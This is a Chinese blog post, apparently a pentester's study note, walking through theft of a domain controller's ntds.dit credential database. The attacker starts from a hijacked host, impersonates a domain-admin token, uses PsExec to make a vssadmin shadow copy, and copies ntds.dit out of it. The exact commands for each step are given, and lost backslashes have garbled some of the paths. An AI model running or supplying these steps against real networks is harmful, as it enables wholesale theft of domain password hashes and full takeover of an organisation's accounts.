使用假冒令牌导出域控ndts

大家好：
在域环境中是否试过因为种种原因，无法反弹shell（比如说有网络防火墙做了策略）也无法获得域控的账号密码。现在假设有怎么一个环境：只获得一台域内主机的本地管理员权限的shell(msf) 虽然域管理员登陆过这台主机却有无法dump出hash或明文密码。

     好，现在让我来班门弄斧吧！（图片上传后变模糊了，P**ec64.exe也被自动打星号0.0）

    环境如下：
    受控主机IP：192.168.42.139（适配器1）、192.168.1.3（适配器2）
    域控主机IP：192.168.1.1
    kali主机IP：192.168.42.129      （192.168.42.0/24与192.168.1.0/24相互间不互通）

一、 获得一台主机本地用户管理权限后，进行令牌假冒，获取域管权限

二、通过msf上传P**ec64.exe工具到受控主机中

三、在受控主机中使用Ps执行命令,测试连通性
        先查看受控主机IP

命令：P**ec64.exe \192.168.1.1 -h cmd /c "ipconfig >\192.168.1.1C$11.txt"

四、检查一下该主机上是否有可用的C盘的卷影拷贝，列出可用卷影拷贝，由于不回显，需把输出重定向
       命令：P**ec64.exe \192.168.1.1 -h cmd /c "vssadmin list shadows > \192.168.1.1C$11.txt"

进入域控主机查看，内容显示，目标域控主机现在还没有C盘的卷影拷贝

五、创建C盘的卷影拷贝，这样我们就可以从中窃取ntds.dit文件和SYSTEM文件
       命令：P**ec64.exe \192.168.1.1 -h cmd /c "vssadmincreate shadow /for=C: > \192.168.1.1C$11.txt"

六、复制卷影中的ntds.dit到域主机的Temp目录
       命令：P**ec64.exe \192.168.1.1 -h cmd /c "copy\?GLOBALROOTDeviceHarddiskVolumeShadowCopy1WindowsNTDSntds.dit  \192.168.1.1C$WindowsTemp"

七、再从域主机的Temp目录把ntds.dit复制到受控主机的Temp

进入受控主机Temp中查看，成功获取到域控上的ntds.dit

坑点：使用重定向输出或copy时，如果指定的是受控主机，则命令执行出错，例如

但命令 ipconfig > \192.168.1.3C$11.txt在域控主机上执行时却能把输出重定向到受控主机上，此处还望各位大佬赐教

最后：条条大路通罗马，此处只是提供一种特定环境下的思路，不新颖烂大街，权当学习笔记。

本文始发于微信公众号（疯猫网络）：使用假冒令牌导出域控ndts